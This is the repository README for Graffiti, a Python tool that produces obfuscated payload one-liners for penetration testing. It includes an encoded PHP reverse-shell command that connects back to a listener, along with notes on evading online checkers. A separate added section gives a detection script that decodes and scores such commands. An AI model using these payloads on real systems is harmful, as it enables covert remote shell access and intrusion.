  • Stars: 176
  • Rank: 215,696 (Top 5 %)
  • Language: Python
  • Created almost 6 years ago
  • Updated over 5 years ago

Repository Details

A tool to generate obfuscated one liners to aid in penetration testing

NOTE: Never upload payloads to online checkers

Graffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:

  • Python
  • Perl
  • Batch
  • Powershell
  • PHP
  • Bash

Graffiti will also accept a language that is not currently on the list and store the oneliner into a database.

Features

Graffiti comes with a database into which each encoded payload is inserted, so that end users can view previously created payloads for future use. The payloads can be encoded using the following techniques:

  • Xor
  • Base64
  • Hex
  • ROT13
  • Raw

Some features of Graffiti include:

  • Terminal drop in access, with the ability to run external commands
  • Ability to create your own payload JSON files
  • Ability to view cached payloads inside of the database
  • Ability to run the database in memory for quick deletion
  • Terminal history and saving of terminal history
  • Auto tab completion inside of terminal
  • Ability to securely wipe the history files and database file
  • Multiple encoding techniques as mentioned above

Usage

Graffiti comes with a built-in terminal; when you pass no flags to the program, it drops into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. To get help, just type help or ?:

  ________              _____  _____.__  __  .__ 
 /  _____/___________ _/ ____\/ ____\__|/  |_|__|
/   \  __\_  __ \__  \\   __\\   __\|  \   __\  |
\    \_\  \  | \// __ \|  |   |  |  |  ||  | |  |
 \______  /__|  (____  /__|   |__|  |__||__| |__|
        \/           \/           
 v(0.1)               

no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
root@graffiti:~/graffiti# ?

 Command                                  Description
---------                                --------------
 help/?                                  Show this help
 external                                List available external commands
 cached                                  Display all payloads that are already in the database
 list/show                               List all available payloads
 search <phrase>                         Search for a specific payload
 use <payload> <coder>                   Use this payload and encode it using a specified coder
 info <payload>                          Get information on a specified payload
 check                                   Check for updates
 history                                 Display command history
 exit/quit                               Exit the terminal and running session
 encode <script-type> <coder>            Encode a provided payload

root@graffiti:~/graffiti# help

 Command                                  Description
---------                                --------------
 help/?                                  Show this help
 external                                List available external commands
 cached                                  Display all payloads that are already in the database
 list/show                               List all available payloads
 search <phrase>                         Search for a specific payload
 use <payload> <coder>                   Use this payload and encode it using a specified coder
 info <payload>                          Get information on a specified payload
 check                                   Check for updates
 history                                 Display command history
 exit/quit                               Exit the terminal and running session
 encode <script-type> <coder>            Encode a provided payload

Graffiti also comes with command line arguments for when you need a payload encoded quickly:

usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                   [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                   [-l]
                   [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                   [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                   [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

optional arguments:
  -h, --help            show this help message and exit
  -c CODEC, --codec CODEC
                        specify an encoding technique (*default=None)
  -p PAYLOAD, --payload PAYLOAD
                        pass the path to a payload to use (*default=None)
  --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                        create a payload file and store it inside of
                        ./etc/payloads (*default=None)
  -l, --list            list all available payloads by path (*default=False)
  -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                        pass your own personal payload to use for the encoding
                        (*default=None)
  -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                        pass a listening address to use for the payload (if
                        needed) (*default=None)
  -lP LISTENING-PORT, --lport LISTENING-PORT
                        pass a listening port to use for the payload (if
                        needed) (*default=None)
  -u URL, --url URL     pass a URL if needed by your payload (*default=None)
  -vC, --view-cached    view the cached data already present inside of the
                        database
  -H, --no-history      do not store the command history (*default=True)
  -W, --wipe            wipe the database and the history (*default=False)
  --memory              initialize the database into memory instead of a .db
                        file (*default=False)
  -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                        pass more external commands, this will allow them to
                        be accessed inside of the terminal commands must be in
                        your PATH (*default=None)

Encoding a payload is as simple as this:

root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
Encoded Payload:
--------------------------------------------------

php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'

--------------------------------------------------
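
On the detection side, a decode-then-execute wrapper like the one above stands out in process command-line logs. The following is an added example, not part of Graffiti: it finds base64 bodies (and, going beyond the case shown, plain hex bodies), decodes them, and scores the result. The indicator list, scoring weights and function names are assumptions made for illustration.

```python
import base64
import binascii
import re

# Runs that look like base64 or hex bodies inside a logged command line.
B64_RUN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){12,}(?![0-9A-Fa-f])")
# Decode wrappers: real PHP, Python and .NET function names.
WRAPPER = re.compile(r"base64_decode|b64decode|FromBase64String|hex2bin|fromhex", re.I)
# Assumed indicator list: strings that make a decoded body worth a closer look.
INDICATORS = ("fsockopen", "socket", "/bin/sh", "/bin/bash", "cmd.exe", "exec(")
# The encoded one-liner shown on this page, used as sample input.
PAGE_SAMPLE = """php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'"""

def _printable(raw):
    """Return the decoded text only if it is plain printable ASCII."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None

def decode_candidates(cmdline):
    """Yield (codec, decoded_text) for every run that decodes cleanly."""
    for m in B64_RUN.finditer(cmdline):
        token = m.group(0)
        if len(token) % 4:          # valid base64 is padded to a multiple of 4
            continue
        try:
            text = _printable(base64.b64decode(token, validate=True))
        except binascii.Error:
            continue
        if text:
            yield "base64", text
    for m in HEX_RUN.finditer(cmdline):
        text = _printable(bytes.fromhex(m.group(0)))
        if text:
            yield "hex", text

def triage(cmdline):
    """Score one logged command line; a higher score means review it first."""
    wrapped = 2 if WRAPPER.search(cmdline) else 0   # assumed weight for a wrapper
    out = []
    for codec, text in decode_candidates(cmdline):
        hits = [i for i in INDICATORS if i in text]
        out.append({"codec": codec, "decoded": text, "hits": hits, "score": len(hits) + wrapped})
    return out

if __name__ == "__main__":
    print(triage(PAGE_SAMPLE))
```

XOR-encoded bodies cannot be recovered this way without the key, so for those the wrapper pattern in the command line is the signal to alert on.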

A demo of Graffiti can be found here:

to_video

Installation

On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:

./install.sh

This will install Graffiti into your system and allow you to run it from anywhere.

Bugs and issues

If you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!
